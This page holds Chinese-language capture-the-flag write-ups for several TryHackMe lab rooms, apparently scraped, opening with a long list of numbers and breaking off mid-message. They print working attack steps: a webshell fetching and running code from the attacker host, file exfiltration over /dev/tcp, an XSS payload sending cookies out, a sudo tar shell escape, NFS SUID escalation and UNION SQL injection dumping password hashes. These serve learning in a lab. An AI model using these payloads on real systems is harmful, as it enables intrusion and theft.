11150,11154,11153,11151,11152,11155,11158,11159,11163,11157,11162,11156,11160,11161,11164,11172,11167,11171,11168,11174,11170,11166,11169,11179,11165,11175,11173,11177,11178,11176,11182,11181,11183,11180,11184,11185,11187,11186,11188,11189,11190,10236,10237,10233,10232,11192,10235,11196,10234,11199,11191,11193,11195,11217,11198,11215,11194,11197,11200,11216,11201,11229,11226,11225,11228,11227,11234,11240,11235,11230,11236,11241,11244,11243,11239,11242,11245,11246,11248,11256,11255,11249,11247,11257,11260,11258,11261,11272,11273,11259,11275,11274,11286,11288,11289,11287,11290,11292,11291,11309,11298,11295,10386,11297,11293,10385,11308,11294,11296,11310,11307,10387,11314,11316,11312,11313,11311,11320,11318,11315,11319,11317,11322,11321,11324,11332,11323,11333,11337,11335,11334,11340,11336,11339,11338,11341,10418,10431,10419,10428,10420,10412,10417,10409,10433,10432,10422,10407,10414,10404,10421,10410,10430,10423,10435,10411,10415,10434,10408,10426,10427,10424,10403,10429,10413,10425,10416,10398,10396,10389,10405,10399,10388,10402,10406,10397,10400,11342,10395,10393,10401,10391,10392,10394,10390,11351,11347,11343,11346,11350,11352,11348,11356,11355,11354,11349,11353,10483,10482,10473,10481,10451,10474,10468,10472,10443,10471,10470,10458,10469,10467,11357,11359,10457,11358,11360,11362,11361,11366,11368,11365,11363,11364,11367,11370,11371,11372,11369,11376,11375,11374,11377,11373,11378,11380,11381,11379,11382,11383,11384,11390,11398,11387,11385,11392,11389,11391,11395,11393,11388,11397,11386,11394,11396,11399,11409,11404,11400,11401,11402,11407,11405,11413,11412,11411,11403,11406,11410,11416,11414,11408,11415,11417,11420,11419,11418,11421,11422,11423,11424,11425,11426,11427,11430,11428,11432,11429,11433,11431,11436,11435,11434,11437,11438,11441,11442,11440,11439,11445,11443,11452,11444,11448,11453,11449,11454,11446,11447,11450,11455,11451,11457,11456,11458,11459,11460,11461,11462,11464,11463,11465,11466,11470,11469,11467,11468,11471,11472,11473,11474,11475,11476,11477,11478,11479,11480,11481,11482,11483,11484,11486,11485,11487,11488,11489,11490,11493,11491,11494,11492,11496,11497,11495,11500,11501,11502,11498,11499,11503,11504,11505,11506,11507,11509,11510,11512,11508,11514,11511,11513,11515,11517,11516,11519,11518,11520,11521,11524,11523,11522,11527,11525,11526,11529,11528,11530,11531,11532,11535,11533,11534,11536,11538,11537,11539,11540,11541,11542,11543,11546,11545,11544,11550,11549,11548,11547,11552,11551,11553,11556,11554,11557,11555,11558,11559,11564,11562,11560,11563,11561,11565,11566,11567,11568,11569,11570,11572,11576,11575,11608,11609,11610,11611,11795,11612,11796,11800,11798,11803,11799,11802,11797,11801,11812,11804,11808,11811,11807,11809,11820,11815,11817,11810,11805,11824,11816,11806,11823,11821,11814,11819,11813,11827,11826,11818,11822,11825,11829,11828,11831,11833,11830,11832,10847,10846,10845,10848,11834,11839,11836,11835,11840,11838,11837,11841,11843,11842,11844,10877,10872,10873,10871,10876,10875,10869,10868,10867,10874,10870,11845,10859,11846,10854,10853,10851,10850,10849,11848,11849,10852,11852,11847,11850,11855,11851,11853,11854,11856,11860,11859,11858,11863,11857,11864,11861,11865,11862,11866,11867,11868,10917,10916,10900,10915,10910,10914,10908,10906,10909,10907,10899,10913,10911,10912,10898,10897,11870,11869,11871,11872,11873,11876,11875,11878,11877,11874,11879,11881,11880,11883,11882,11884,11886,11885,11888,11887,11890,11889,11891,11892,11893,11895,11894,11896,11897,11900,11898,11899,11901,11902,11904,11903,11905,11906,11908,11910,11909,11911,11907,11912,11913,11914,11916,11915,11917,11918,11919,11920,11921,11924,11922,11923,11927,11925,11926,11929,11928,11931,11932,11930,11933,11934,11935,11936,11937,11938,11939,11940,11941,11942,11945,11946,11943,11944,11947,11948,11949,11950,11951,11953,11952,11956,11954,11957,11958,11955,11961,11960,11959,11962,11963,11964,11965,11966,11968,11967,11971,11969,11970,11972,11974,11973,11975,11977,11976,11978,11979,11980,11982,11981,11983,11985,11984,11986,11987,11990,11989,11988,11992,11991,11995,11993,11996,11994,11997,11999,11998,12000,12001,12002,12003,12004,12007,12006,12005,12008,12009,12015,12016,12017,12013,12014,12011,12020,12012,12019,12010,12018,12021,12023,12024,12022,12025,12026,12027,12028,12030,12029,12034,12031,12032,12033,12035,12036,12038,12039,12042,12037,12041,12040,12043,12045,12047,12044,12048,12049,12050,12046,12051,12052,12053,12054,12055,12056,12058,12057,12059,12060,12064,12061,12063,12065,12066,12062,12067,12068,12069,12071,12070,11214,11211,12072,11207,11212,11213,11209,11210,11206,11208,11202,11203,11204,11205,12073,12074,12077,12075,12076,12078,12079,12083,12082,12081,12080,12084,12085,12087,12086,12090,12089,12088,12091,12092,12094,12093,12095,12096,12098,12097,12101,12099,12102,12100,12107,12104,12106,12103,12105,12108,12109,12110,11224,11222,11221,11223,11220,11238,11219,11218,11232,11237,11231,11233,12111,12113,12112,12118,12114,12117,12121,12120,12116,12119,12115,11265,11266,11282,11276,11270,11278,11267,11284,11285,11269,11283,12122,11279,11262,11268,11277,11280,11263,11250,11271,11281,11253,11254,11264,11251,11252,12123,12124,12125,12126,12127,12130,12131,12128,12132,12134,12129,11331,11328,11326,11330,11325,11306,11329,12133,11304,11327,11300,11301,12140,11305,12139,11303,11299,12135,11302,12137,12138,12136,12141,12142,12144,12143,12145,12147,12148,12149,12150,12151,12146,12153,12152,11345,12154,12155,12156,11344,12158,12157,12163,12165,12159,12161,12160,12166,12162,12164,12167,12168,12171,12169,12170,12172,12173,12176,12178,12177,12174,12175,12179,12180,12182,12181,12183,12185,12184,12187,12188,12186,12191,12192,12189,12193,12190,12194,12195,12196,12197,12198,12199,12200,12201,12203,12202,12204,12205,12206,12207,12208,12209,12210,12212,12211,12214,12217,12213,12215,12216,12218,12219,12220,12221,12222,12224,12225,12226,12223,12227,12228,12230,12229,12231,12234,12235,12232,12233,12238,12236,12237,12240,12239,12244,12242,12243,12241,12249,12246,12245,12248,12250,12251,12254,12247,12252,12255,12253,12259,12258,12256,12257,12261,12260,12262,12264,12263,12265,12268,12267,12269,12266,12270,12272,12271,12273,12274,12278,12277,12276,12281,12275,12279,12282,12280,12283,12284,12286,12285,12288,12287,12289,12290,12291,12292,12294,12296,12295,12293,12298,12297,12299,12302,12300,12303,12301,12304,12305,12306,12310,12311,12316,12309,12307,12313,12314,12308,12312,12317,12321,12318,12322,12326,12320,12325,12319,12324,12323,12327,12328,12329,12330,12332,12331,12315,12334,12335,12333,12336,12337,12339,12338,12340,12343,12341,12344,12342,12345,12346,12348,12347,12352,12350,12349,12351,12353,12354,12361,12358,12356,12355,12366,12359,12364,12367,12365,12360,12362,12363,12357,12368,12369,12370,11587,11595,11596,11593,11579,11582,11584,11588,11598,11590,11585,11592,11583,11594,11591,11586,11597,11580,11589,11574,11573,11578,11577,11571,11581,12372,12371,12373,12376,12380,12382,12379,12378,12374,12377,12375,12381,12384,12383,12392,12387,12391,12385,12390,12389,12386,12388,12393,12394,12398,12396,12397,12399,12401,12400,12395,12404,12402,12403,12405,12406,12409,12407,12411,12408,12413,12410,12414,12415,12416,11644,12412,11648,11646,11647,11645,11649,11643,11636,11639,11642,11635,11640,11632,12417,11626,11634,11623,11630,11625,11615,11628,11622,11641,11638,11627,11631,11613,11619,11624,11620,11629,11637,11633,11616,11614,11607,11617,11621,11618,11603,11602,11601,11606,11605,11600,11604,11599,12418,12420,12419,12421,12422,12424,12423,12425,12447,12439,12441,12436,12437,12445,12451,12450,12442,12446,12449,12440,12426,12452,12438,12448,12455,12443,12444,12453,12454,12456,12458,12459,12457,12463,12462,12474,12475,12473,12476,11793,11792,11794,11788,11785,11786,11791,11782,11784,11776,11790,11780,11789,11783,11787,11778,11772,11770,11781,11777,11779,11768,11774,11769,11767,11771,11775,11761,11773,11765,11764,11762,11755,11758,11751,11754,11759,11745,11753,11747,11766,11757,11760,11763,11756,11744,11735,11746,11750,11738,11743,11740,11741,11748,11749,11752,11732,11737,11742,11730,11727,11731,11736,11734,11729,11739,11733,11728,12485,12483,12478,12477,12484,12486,12487,12491,12493,12492,12495,12494,12496,12497,12498,12500,12502,12501,12499,12503,12504,12505,12506,12508,12507,12509,12512,12510,12514,12511,12513,12515,12516,12517,12518,12524,12520,12523,12522,12519,12521,12526,12525,12527,12529,12528,12530,12531,12532,12534,12536,12533,12535,12543,12538,12537,12539,12544,12540,12541,12542,12547,12546,12554,12545,12548,12549,12553,12555,12551,12556,12552,12550,12557,12559,12558,12560,12562,12561,12563,12564,12566,12567,12568,12565,12569,12570,12573,12572,12571,12574,12579,12576,12577,12575,12580,12578,12584,12581,12583,12586,12587,12582,12585,12588,12590,12589,12592,12595,12593,12591,12594,12596,12599,12600,12597,12601,12598,12604,12602,12605,12606,12603,12607,12608,12610,12609,12611,12612,12615,12613,12614,12628,12631,12632,12626,12627,12629,12630,12633,12634,12635,12636,12646,12647,12648,12649,12650,12653,12651,12656,12655,12654,12652,12658,12662,12660,12659,12657,12661,12665,12663,12664,12666,12669,12667,12668,12670,12671,12672,12673,12674,12675,12676,12679,12677,12685,12678,12686,12688,12687,12697,12698,12699,12701,12700,12713,12703,12712,12714,12711,12702,12720,12716,12717,12721,12718,12719,12715,12722,12725,12723,12724,12726,12728,12730,12727,12735,12731,12729,12734,12737,12732,12733,12736,12739,12745,12738,12740,12748,12746,12761,12749,12762,12750,12747,12770,12765,12772,12768,12766,12767,12769,12763,12778,12775,12780,12782,12777,12776,12771,12764,12781,12784,12783,12779,12787,12786,12788,12790,12789,12791,12794,12797,12798,12800,12799,12796,12802,12795,12793,12792,12803,12801,12804,12808,12806,12815,12816,12807,12805,12819,12817,12818,12820,12823,12824,12826,12822,12825,12821,12827,12828,12829,12832,12831,12830,12834,12835,12833,12836,12837,12838,12839,12841,12842,12840,12843,12846,12844,12850,12848,12849,12845,12851,12847,12854,12852,12855,12853,12856,12858,12857,12860,12861,12859,12862,12863,12864,12865,12867,12868,12866,12869,12872,12875,12873,12870,12874,12876,12878,12871,12879,12882,12880,12883,12881,12877,12887,12885,12886,12884,12889,12890,12896,12893,12892,12891,12888,12895,12894,12897,12898,12900,12901,12899,12904,12903,12902,12907,12905,12906,12908,12910,12909,12911,12913,12912,12915,12916,12914,12917,12918,12919,12921,12922,12920,12924,12925,12923,12926,12927,12928,12929,12932,12930,12933,12931,12934,12942,12936,12935,12939,12937,12943,12944,12940,12941,12945,12938,12946,12947,12949,12951,12950,12948,12952,12953,12954,12958,12956,12962,12955,12959,12960,12961,12957,12970,12972,12966,12965,12969,12968,12967,12964,12973,12974,12976,12978,12971,12985,12977,12979,12963,12981,12987,12986,12984,12982,12993,12990,12988,12975,12992,12980,12989,12983,12991,12999,12995,12996,13000,13002,13001,12994,12997,12998,13003,13004,13007,13015,13012,13011,13008,13017,13016,13005,13014,13009,13010,13018,13006,13013,13031,13033,13030,13149,13029,13035,13034,13032,13037,13036,13152,13150,13151,13235,13153,13236,13237,13240,13241,13238,13242,13245,13239,13247,13243,13244,13246,13248,13249,13255,13258,13257,13260,13259,13262,13256,13270,13264,13263,13269,13271,13272,13275,13276,13277,13278,13279,13280,13282,13284,13286,13283,13285,13281,13287,13288,13290,13294,13293,13289,13291,13292,13296,13297,13295,13299,13305,13302,13300,13298,13301,13306,13303,13304,12435,12430,12428,12433,12432,12431,12434,12427,12429,13308,13307,13309,13311,13312,13310,13314,13317,13315,13316,13313,13318,13319,13323,13321,13320,13324,13325,13326,13322,13327,13328,13329,13330,13331,13333,13332,13334,12470,12472,12469,12466,12467,12471,12468,12464,12465,12461,12460,13336,13335,13339,13337,13338,13342,13341,13344,13343,13340,13345,13346,13347,13348,13349,13350,12490,12489,12488,12482,12481,12479,12480,13351,13353,13352,13354,13356,13355,13357,13358,13359,13367,13364,13361,13360,13363,13362,13365,13366,13369,13373,13370,13371,13368,13379,13372,13378,13374,13376,13375,13381,13382,13380,13377,13383,13384,13385,13390,13386,13388,13387,13389,13391,13392,13399,13393,13395,13400,13397,13404,13396,13398,13402,13403,13415,13408,13407,13412,13401,13394,13405,13406,13416,13409,13417,13414,13410,13411,13419,13418,13413,13420,13424,13421,13425,13423,13422,13426,13427,13428,13430,13429,13431,13432,13434,13433,13437,13436,13440,13439,13435,13438,13444,13443,13449,13448,13447,13442,13446,13454,13441,13451,13450,13457,13456,13445,13455,13465,13452,13453,13458,13462,13459,13461,13469,13467,13466,13470,13472,13460,13468,13464,13463,13471,13474,13476,13473,13479,13475,13477,13478,13481,13480,13482,12624,13496,12620,12616,12623,12622,13497,12625,12617,12621,12619,12618,13500,13499,13502,13501,13498,13503,13507,13505,13504,13509,13506,13511,13508,13512,13514,13510,13515,13513,12642,12645,12640,12637,12644,12643,12639,12638,12641,13517,13521,13519,13522,13516,13518,13520,13523,13524,13525,13526,13528,13530,13531,13527,13529,13532,13533,13534,13535,13536,13537,13539,13538,13541,13543,13540,13542,13544,13545,13546,13547,13548,13549,13550,13551,13552,13554,13553,12710,12707,12709,12708,13555,12705,13556,12706,12694,12704,12683,12693,12690,12680,12695,12684,12692,12681,12689,12696,12682,13557,12691,13561,13560,13562,13559,13558,13570,13568,13565,13571,13564,13567,13563,13566,13575,13574,13573,13569,13572,13576,13578,13577,13579,12741,12759,12751,12785,12752,13580,12743,12744,12756,12754,12774,12755,12760,12753,12757,12758,12773,12742,13581,13582,13583,13584,13585,13586,13587,13589,13588,12812,12814,12813,12811,12810,12809,13590,13593,13592,13591,13594,13598,13595,13596,13597,13599,13601,13600,13602,13603,13605,13606,13604,13608,13607,13609,13610,13611,13612,13614,13615,13613,13616,13617,13619,13618,13620,13621,13625,13622,13624,13623,13627,13626,13628,13629,13630,13634,13635,13632,13633,13636,13631,13637,13638,13641,13640,13642,13639,13646,13645,13647,13643,13644,13649,13648,13652,13650,13655,13654,13651,13653,13656,13657,13658,13660,13659,13661,13663,13662,13664,13665,13667,13666,13668,13671,13670,13672,13669,13675,13674,13677,13673,13676,13681,13686,13679,13685,13680,13682,13687,13678,13683,13684,13688,13691,13693,13695,13689,13694,13690,13692,13697,13696,13698,13699,13701,13700,13702,13703,13704,13708,13706,13707,13709,13710,13705,13713,13711,13712,13722,13716,13714,13717,13725,13723,13720,13715,13727,13721,13724,13718,13726,13729,13728,13731,13719,13730,13732,13733,13734,13745,13738,13735,13740,13743,13741,13746,13744,13737,13739,13742,13736,13747,13748,13750,13754,13048,13752,13753,13749,13756,13043,13755,13751,13044,13047,13027,13757,13021,13019,13045,13038,13046,13028,13042,13026,13020,13039,13025,13041,13024,13022,13040,13023,13758,13759,13762,13760,13761,13766,13765,13763,13764,13767,13768,13772,13061,13059,13062,13060,13773,13774,13779,13780,13791,13792,13794,13793,13795,13800,13796,13799,13797,13801,13798,13802,13074,13808,13840,13809,13807,13075,13806,13823,13824,13839,13841,13842,13104,13106,13103,13105,13101,13102,13100,13099,13088,13098,13089,13090,13087,13844,13854,13853,13856,13851,13096,13094,13097,13095,13852,13850,13855,13857,13858,13863,13849,13865,13864,13866,13867,13868,13872,13871,13869,13870,13873,13874,13127,13134,13129,13132,13131,13118,13117,13122,13115,13135,13116,13133,13128,13111,13124,13123,13107,13121,13126,13130,13109,13119,13113,13120,13112,13114,13108,13110,13125,13144,13148,13146,13138,13142,13143,13145,13147,13137,13139,13136,13140,13141,13163,13875,13164,13162,13174,13878,13165,13170,13158,13167,13169,13173,13172,13175,13154,13166,13155,13161,13160,13157,13171,13168,13156,13159,13880,13879,13882,13883,13881,13885,13884,13887,13886,13892,13888,13890,13889,13891,13227,13232,13893,13234,13894,13233,13220,13228,13221,13224,13230,13231,13213,13212,13229,13223,13222,13214,13199,13204,13218,13215,13216,13225,13207,13217,13226,13208,13219,13205,13210,13206,13209,13193,13201,13200,13202,13198,13195,13211,13203,13185,13194,13189,13187,13184,13188,13197,13191,13192,13186,13196,13183,13190,13895,13179,13178,13181,13898,13896,13177,13180,13176,13182,13897,13899,13900,13906,13902,13901,13905,13904,13253,13251,13254,13907,13903,13252,13250,13908,13909,13910,13912,13911,13913,13914,13261,13915,13267,13274,13265,13916,13268,13273,13266,13917,13918,13919,13920,13921,13924,13925,13926,13923,13922,13928,13930,13927,13931,13932,13933,13929,13934,13935,13936,13938,13939,13941,13937,13942,13943,13940,13944,13945,13946,13947,13948,13951,13949,13950,13952,13953,13954,13955,13956,13957,13958,13959,13962,13960,13961,13963,13966,13968,13964,13965,13967,13972,13969,13971,13973,13979,13970,13977,13975,13981,13974,13978,13982,13980,13983,13984,13987,13986,13988,13976,13985,13989,13990,13993,13991,13992,13994,13997,13998,13995,13996,13999,13487,13489,13490,13486,13484,13488,13491,13485,13483,13494,13495,13492,13493,13778,13775,13770,13769,13777,13787,13789,13771,13783,13788,13784,13776,13790,13781,13782,13786,13785,13834,13833,13837,13825,13838,13835,13822,13836,13832,13820,13817,13829,13827,13828,13814,13803,13830,13831,13821,13826,13815,13819,13805,13818,13811,13804,13816,13813,13810,13812,13862,13861,13848,13860,13859,13847,13845,13843,13846,13877,13876 10.10.150.136 發現 nmap 結果都一樣- 9100 ~ 9107 好像不太一樣 但實際連上去看起來還是一樣的直接用 ssh 連線- 他跟我說了一個 Lower 輸入比較大的數字又跟我說 Higher我們可以計算一下 port 的最小跟最大值- 13999 - 9000 = 4999如果透過二分搜尋法的話， Worst case 是- log2(13999 - 9000) = 1504發現他的 High Low 是反的 import subprocess ip = "10.10.150.136" ports = open("ports.txt").read().split("\n") ports = [int(i) for i in ports] ports.sort() # port = ports[-1] l = ports[0] r = ports[-1] while True: port = int((l+r)/2) print(f"L={l} , R={r}") process = subprocess.Popen(['ssh', '-o' , 'StrictHostKeyChecking=no' , str(ip) , '-p' , str(port)], stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = process.communicate() print(port , out) if out == b'Lower\r\n': # r = port l = port elif out == b'Higher\r\n': # l = port r = port else: print("!!!!!") break 爆出結果是 9934上面出現一堆的亂碼- You've found the real service. Solve the challenge to get access to the box Jabberwocky 'Mdes mgplmmz, cvs alv lsmtsn aowil Fqs ncix hrd rxtbmi bp bwl arul; Elw bpmtc pgzt alv uvvordcet, Egf bwl qffl vaewz ovxztiql. 'Fvphve ewl Jbfugzlvgb, ff woy! Ioe kepu bwhx sbai, tst jlbal vppa grmjl! Bplhrf xag Rjinlu imro, pud tlnp Bwl jintmofh Iaohxtachxta!' Oi tzdr hjw oqzehp jpvvd tc oaoh: Eqvv amdx ale xpuxpqx hwt oi jhbkhe-- Hv rfwmgl wl fp moi Tfbaun xkgm, Puh jmvsd lloimi bp bwvyxaa. Eno pz io yyhqho xyhbkhe wl sushf, Bwl Nruiirhdjk, xmmj mnlw fy mpaxt, Jani pjqumpzgn xhcdbgi xag bjskvr dsoo, Pud cykdttk ej ba gaxt! Vnf, xpq! Wcl, xnh! Hrd ewyovka cvs alihbkh Ewl vpvict qseux dine huidoxt-achgb! Al peqi pt eitf, ick azmo mtd wlae Lx ymca krebqpsxug cevm. 'Ick lrla xhzj zlbmg vpt Qesulvwzrr? Cpqx vw bf eifz, qy mthmjwa dwn! V jitinofh kaz! Gtntdvl! Ttspaj!' Wl ciskvttk me apw jzn. 'Awbw utqasmx, tuh tst zljxaa bdcij Wph gjgl aoh zkuqsi zg ale hpie; Bpe oqbzc nxyi tst iosszqdtz, Eew ale xdte semja dbxxkhfe. Jdbr tivtmi pw sxderpIoeKeudmgdstd 看起來是 jabberwocky 的詩，透過某種方法進行編碼/加密https://www.poetryfoundation.org/poems/42916/jabberwocky分析密文- 推測可能是 Chaocipher 或 Vigenere Cipher透過網站爆破- https://www.boxentriq.com/code-breaking/vigenere-cipher 炸出了結果twas brillig and the slithy toves did gyre and gimble in the wabe all mimsy were the borogoves and the mome raths outgrabe beware the jabberwock my son the jaws that bite the claws that catch beware the jubjub bird and shun the frumious bandersnatch he took his vorpal sword in hand long time the manxome foe he sought so rested he by the tumtum tree and stood awhile in thought and as in uffish thought he stood the jabberwock with eyes of flame came whiffling through the tulgey wood and burbled a key 為 thealphabetcipher透過廚師正式解碼- 'Twas brillig, and the slithy toves Did gyre and gimble in the wabe; All mimsy were the borogoves, And the mome raths outgrabe. 'Beware the Jabberwock, my son! The jaws that bite, the claws that catch! Beware the Jubjub bird, and shun The frumious Bandersnatch!' He took his vorpal sword in hand: Long time the manxome foe he sought-- So rested he by the Tumtum tree, And stood awhile in thought. And as in uffish thought he stood, The Jabberwock, with eyes of flame, Came whiffling through the tulgey wood, And burbled as it came! One, two! One, two! And through and through The vorpal blade went snicker-snack! He left it dead, and with its head He went galumphing back. 'And hast thou slain the Jabberwock? Come to my arms, my beamish boy! O frabjous day! Callooh! Callay!' He chortled in his joy. 'Twas brillig, and the slithy toves Did gyre and gimble in the wabe; All mimsy were the borogoves, And the mome raths outgrabe. Your secret is bewareTheJabberwock 看到了 secret 為 bewareTheJabberwock輸入後 取得了一組帳號密碼jabberwock:ThankedDrownedSpeakWishing SSH 可以正常連上取得 User Flag- }32a911966cab2d643f5d57d9e0173d56{mht 看起來是字串反轉 thm{65d3710e9d75d5f346d2bac669119a23} 提權 起手式 sudo -l準備豌豆- sudo 版本怪怪ㄉ- 檔案系統可能怪怪ㄉ發現重新開機會用 jabberwock 使用者執行腳本- 而這個腳本我們可寫- 寫一個 reverse shell 然後重開機 重新開機後順利收到 shell- 二次提權 python3 -c 'import pty; pty.spawn("/bin/bash")'觀察家目錄的檔案- dcfff5eb40423f055a4cd0a8d7ed39ff6cb9816868f5766b4088b9e9906961b9 7692c3ad3540bb803c020b3aee66cd8887123234ea0c6e7143c0add73ff431ed 28391d3bc64ec15cbb090426b04aa6b7649c3cc85f11230bb0105e02d15e3624 b808e156d18d1cecdcc1456375f8cae994c36549a07c8c2315b473dd9d7f404f fa51fd49abf67705d6a35d18218c115ff5633aec1f9ebfdc9d5d4956416f57f6 b9776d7ddf459c9ad5b0e1d6ac61e27befb5e99fd62446677600d7cacef544d0 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8 7468652070617373776f7264206973207a797877767574737271706f6e6d6c6b 看起來是一堆的 hash ...

URL : https://tryhackme.com/room/cowboyhacker IP : 10.10.164.54 Recon 掃 Portrustscan -a 10.10.164.54 -r 1-65535 21 22 80nmap -A -p21,22,80 10.10.164.54- FTP 可以匿名登入 !!觀察首頁- 沒啥東東dirsearch- 也沒啥東東 FTP Anonymous login FTP 登入 裡面有兩ㄍ檔案都載下來FTP 檔案- 作者是 lin- 看起來是一個密碼表 爆破密碼 hydra -l 'lin' -P locks.txt ssh://10.10.164.54 帳號 : lin 密碼 : RedDr4gonSynd1cat3SSH 登入成功- 取得 user flag- 提權 起手式 sudo -l 發現可以用 sudo tarGTFOBins 尋找 tar sudo 提權- https://gtfobins.github.io/gtfobins/tar/#sudo sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh提權完畢，取得 root flag-

URL : https://tryhackme.com/room/overpass3hosting IP : 10.10.208.60 Recon 先掃 Portrustscan -a 10.10.208.60 嘗試 FTP Anonymous 登入- 發現不行觀察首頁- 掃目錄- python3 dirsearch.py -u http://10.10.208.60/ /backups/ 找到一包 Backup GPG 解密 觀察 Backupwget http://10.10.208.60/backups/backup.zip 裡面有兩個檔案 gpg 加密後的檔案跟它的 keygpg --import priv.key gpg --output ./a.xlsx --decrypt ./CustomerDetails.xlsx.gpg解開後是一個 Excel 表格- paradox:ShibesAreGreat123 0day:OllieIsTheBestDog muirlandoracle:A11D0gsAreAw3s0me 爆破密碼 有一連串的帳號跟密碼，試著用 Hydra 爆破 SSHhydra -L user.txt -P pass.txt ssh://10.10.208.60 發現 SSH 不能用密碼登入試著爆破 FTP- hydra -L user.txt -P pass.txt ftp://10.10.208.60 找到了一組帳密可以使用paradox:ShibesAreGreat123 FTP 2 Webshell 嘗試登入 FTP 發現看起來是 webroot 放隻 Webshell 上去 put webshell.php 發現成功惹!!使用 Webshell- 放 Reverse shellhttp://10.10.208.60/webshell.php?A=curl%20-o%20%20/tmp/s%2010.13.21.55:8000/s 本地開 nc -nlvp 7877 http://10.10.208.60/webshell.php?A=bash%20/tmp/s 收到 Reverse shell 提權 轉互動式 shellpython3 -c 'import pty; pty.spawn("/bin/bash")'找 Web Flag- find / -iname '*flag*' -print 2>/dev/null 找到在 /usr/share/httpd/web.flagthm{0ae72f7870c3687129f7a824194be09d}準備 Linpeas- curl -o linpeas.sh 10.13.21.55:8000/linpeas.sh bash linpeas.shSudo version 1.8.29發現 nfs 很可疑，但我們先繼續看下去- https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe發現幾個檔案可以 setuid- 但都不能利用發現 nfs 如果需要利用，需要用 showmount，但電腦裡沒有- 自己載一包來放著 curl -o ./showmount http://10.13.21.55:8000/showmount 但 run 起來都失敗 QQ發現根目錄有奇怪的檔案- /.autorelabel 用 nc 傳出來觀察 cat .autorelabel > /dev/tcp/10.13.21.55/1234 發現裡面是空的 QQ突然想到可能可以切換使用者- 因為前面我們 Excel 有密碼 su paradox 切換使用者成功 二次提權 基本上我們猜測接下來就要使用 nfs 的漏洞，但是我們一開始 nfs 在掃 port 時並沒有掃到，因此猜測它只開在 local，我們來掃掃看 local 的 port準備 nmap binaryhttps://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap掃下去- 找到 nfs 開在 2049 port觀察發現 paradox 的 .ssh 只有 public key- 好ㄉ沒啥用 = =本地端有開 nfs 但我們權限很低，那我們可以把 nfs 給用 port forwarding 打出來，使用 chisel- https://github.com/jpillora/chisel curl http://10.13.21.55:8000/chisel -o chisel chmod +x chisel輸入指令- 攻擊機 : ./chisel server --reverse -p 7414靶機 : ./chisel client 10.13.21.55:7414 R:2049:127.0.0.1:2049- 用 nmap 掃攻擊機看看有沒有真的打通- 把 nfs mount 到本機- sudo mount -t nfs localhost:/ mount/ 發現 mount 成功- 裡面有 ssh 的 key，所以我們可以複製出來直接用 james 的 ssh 進行登入 也找到了 User 的 Flag在攻擊機 mount 的 nfs 目錄- 直接複製自己的 /bin/bash 給它 +s 提供 suid再用 james 進行執行- 發現怎麼還是 james QQ再回來攻擊機 chown 把 bash 的 owner 改 root- 就可以ㄌ!!Root flag- thm{a4f6adb70371a4bceb32988417456c44} 學到ㄌ Port forwarding NFS 提權 SUID 要 own=root才能用

URL : https://tryhackme.com/room/marketplace IP : 10.10.74.8 Recon 首先先掃 Portrustscan -a 10.10.74.8 -r 1-65535 有開 22 80 32768nmap -A -p22,80,32768 10.10.74.8- 觀察首頁- 感覺滿廉價ㄉQQ掃目錄- python3 dirsearch.py -u http://10.10.74.8/``robots.txt login signup 嘗試註冊- meow / meow嘗試貼文- 發現下面說不能PO檔案，感覺有埋梗用 F12 把 disable 拔掉再測- 觀察 robots.txt- 觀察 Session- 看起來很 Base64eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibWVvdyIsImFkbWluIjpmYWxzZSwiaWF0IjoxNjI5MDk5NDQwfQ.6MNSd_Wf1ytqceTjhWWGEbB4AhzTHFshHCLIeVF_Zeo 解碼後看起來是 JWT{"alg":"HS256","typ":"JWT"}{"userId":4,"username":"meow","admin":false,"iat":1629099440}5'YrN8VXa!1Ų,^ XSS 發現 Po 文處可以 XSS寫 Payload 偷餅乾- new Image().src="http://10.13.21.55:1234/"+document.cookie 回報給管理員- 用 nc -l 1234 來接- 收到管理員的餅乾GET /token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MjkxMDAxOTN9.f-eVVqF1AnFJEeuam97hn-Xz3fFNbQAJYTKrsDukzrU HTTP/1.1使用管理員帳號登入- 把自己的餅乾換成管理員的首頁- 取得 Flag1- THM{c37a63895910e478f28669b048c348d5} SQLi 發現看使用者這邊可以用 SQL injection點進去之後，透過 F12 複製成 curl 再轉 python 的 request- 測了一陣子發現空白要用 /**/ 來繞"-1/**/UNION/**/SELECT/**/1,2,3,4/**/--")爆 db- p = "-1 UNION SELECT 1,group_concat(schema_name),3,4 FROM information_schema.schemata --" 兩個 DBinformation_schema marketplace先關注這個爆 table- p = "-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables where table_schema='marketplace' --" 發現有三張 tableitems messages users爆 column- p = "-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns where table_schema='marketplace' --" id,author,title,description,image,id,user_from,user_to,message_content,is_read,id,username,password,isAdministrator應該需要觀察的是 username 跟 password選帳號- p = "-1 UNION SELECT 1,group_concat(username),3,4 FROM marketplace.users --" jake,meow,michael,system 選密碼- p = "-1 UNION SELECT 1,group_concat(password),3,4 FROM marketplace.users --" 看起來有過 hash 把他大致整理一下$2b$10$83pRYaR/d4ZWJVEex.lxu.Xs1a/TNDBWIUmB4z.R0DT0MSGIGzsgW, $2b$10$yaYKN53QQ6ZvPzHGAlmqiOwGt8DXLAO5u2844yUlvu2EXwQDGf/1q $2b$10$/DkSlJB4L85SCNhS.IxcfeNpEBn.VkyLvQ2Tk9p2SDsiVcCRb4ukG $2b$10$FStzuEGFk9JpOnigl2gbEuE2rRp27psGUS0UuztTtxbZPFW/Wtn4m 查詢發現是 bcrypthttps://bcrypt-generator.com/ 而且可以測試其中一個是我自己註冊的 meow 爆密碼- john password_hash.txt --wordlist=/opt/rockyou.txt hashcat -m 3200 password_hash.txt rockyou.txt 中研院超級電腦的兩張 V100 吃滿要跑 3 小時，不太合理繼續 SQLi- p = "-1 UNION SELECT 1,group_concat(message_content),3,4 FROM marketplace.messages --" 噴出以下內容User Hello! An automated system has detected your SSH password is too weak and needs to be changed. You have been generated a new temporary 